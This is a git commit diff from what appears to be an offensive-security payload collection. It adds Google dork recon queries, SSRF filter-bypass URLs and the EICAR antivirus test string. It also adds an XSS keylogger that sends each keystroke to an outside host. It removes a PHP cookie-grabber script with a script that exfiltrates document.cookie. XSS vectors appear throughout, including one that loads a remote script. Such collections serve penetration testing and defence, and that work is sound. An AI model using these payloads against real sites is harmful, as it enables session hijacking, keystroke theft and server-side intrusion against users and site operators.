XSS Intruder + Eicar + SSRF http://0

2025-02-21 14:16:07 +00:00 · 2017-07-30 13:17:00 +02:00 · 2017-07-30 13:17:00 +02:00 · 8a3693855f
commit 8a3693855f
parent 064467ecfc
33 changed files with 87 additions and 80 deletions
--- a/Methodology_and_enumeration.md
+++ b/Methodology_and_enumeration.md
@ -18,10 +18,11 @@ knockpy domain.com -w subdomains-top1mil-110000.txt
 * Using Google Dorks and Google Transparency Report
 ```bash
 site:*.domain.com -www
-site:http://domain.com filetype:pdf
-site:http://domain.com inurl:&
-site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
-site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+site:domain.com filetype:pdf
+site:domain.com inurl:'&'
+site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
+site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+site:*.*.domain.com

 You need to include subdomains ;)
 https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
--- a/injection/Intruders/FUZZDB_GenericBlind.txt
+++ b/injection/Intruders/FUZZDB_GenericBlind.txt
--- a/injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt
+++ b/injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt
--- a/injection/Intruders/FUZZDB_MSSQL.txt
+++ b/injection/Intruders/FUZZDB_MSSQL.txt
--- a/injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
+++ b/injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
--- a/injection/Intruders/FUZZDB_MYSQL.txt
+++ b/injection/Intruders/FUZZDB_MYSQL.txt
--- a/injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt
+++ b/injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt
--- a/injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
+++ b/injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
--- a/injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt
+++ b/injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt
--- a/injection/Intruders/FUZZDB_Oracle.txt
+++ b/injection/Intruders/FUZZDB_Oracle.txt
--- a/injection/Intruders/FUZZDB_Postgres_Enumeration.txt
+++ b/injection/Intruders/FUZZDB_Postgres_Enumeration.txt
--- a/injection/Intruders/Generic_SQLi
+++ b/injection/Intruders/Generic_SQLi
--- a/injection/Intruders/SQLi_Polyglots.txt
+++ b/injection/Intruders/SQLi_Polyglots.txt
--- a/injection/README.md
+++ b/injection/README.md
@ -58,5 +58,20 @@ localhost:+11211aaa
 localhost:00011211aaaa
 ```

+Bypass using rare address
+```
+http://0/
+```
+
+Bypass using tricks combination
+```
+http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
+urllib2 : 1.1.1.1
+requests + browsers : 2.2.2.2
+urllib : 3.3.3.3
+```
+
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
+* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
+* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
--- a/files/Eicar/eicar.com.txt
+++ b/files/Eicar/eicar.com.txt
@ -0,0 +1 @@
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
--- a/injection/Cookie
+++ b/injection/Cookie
@ -1,11 +0,0 @@
-<?php 
-// How to use it
-# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
-
-// Write the cookie in a file
-$cookie = $_GET['c'];
-$fp = fopen('cookies.txt', 'a+');
-fwrite($fp, 'Cookie:' .$cookie.'\r\n');
-fclose($fp);
-
-?>
--- a/onerror=alert(document.cookie);.jpg
+++ b/onerror=alert(document.cookie);.jpg
--- a/injection/Files/"><svg
+++ b/injection/Files/"><svg
--- a/injection/Files/'><svg
+++ b/injection/Files/'><svg
--- a/injection/Files/InsecureFlashFile.swf
+++ b/injection/Files/InsecureFlashFile.swf
--- a/injection/Files/SVG_XSS.svg
+++ b/injection/Files/SVG_XSS.svg
--- a/injection/Files/SWF_XSS.swf
+++ b/injection/Files/SWF_XSS.swf
--- a/injection/Files/XML
+++ b/injection/Files/XML
--- a/injection/Files/XML_XSS_cheatsheet.html
+++ b/injection/Files/XML_XSS_cheatsheet.html
--- a/injection/Files/xss_comment_exif_metadata_double_quote.png
+++ b/injection/Files/xss_comment_exif_metadata_double_quote.png
--- a/injection/Files/xss_comment_exif_metadata_single_quote.png
+++ b/injection/Files/xss_comment_exif_metadata_single_quote.png
--- a/injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt
+++ b/injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt
--- a/injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt
+++ b/injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt
@ -97,9 +97,6 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
 <body onhashchange=alert(1)><a href=#x>click this!#x
 <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
 <body onscroll=alert(1)><br><br><br><br>
-<br><br><br><br><br><br><br><br><br><br>
-<br><br><br><br><br><br><br><br><br><br>
-<br><br><br><br><br><br><x id=x>#x
 <body onresize=alert(1)>press F12!
 <body onhelp=alert(1)>press F1! (MSIE)
 <marquee onstart=alert(1)>
--- a/injection/Intruders/JHADDIX_XSS.txt
+++ b/injection/Intruders/JHADDIX_XSS.txt
--- a/injection/Intruders/MarioXSSVectors.txt
+++ b/injection/Intruders/MarioXSSVectors.txt
--- a/injection/Intruders/RSNAKE_XSS.txt
+++ b/injection/Intruders/RSNAKE_XSS.txt
@ -1,4 +1,3 @@
-# credit to rsnake
 <SCRIPT>alert('XSS');</SCRIPT>
 '';!--"<XSS>=&{()}
 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
--- a/injection/Intruders/XSS_Polyglots.txt
+++ b/injection/Intruders/XSS_Polyglots.txt
--- a/injection/README.md
+++ b/injection/README.md
@ -18,6 +18,11 @@ fclose($fp);
 ?>
 ```

+Keylogger for XSS
+```
+<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
+```
+
 ## XSS in HTML/Applications
 XSS Basic
 ```
				`@ -0,0 +1 @@`
				`X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*`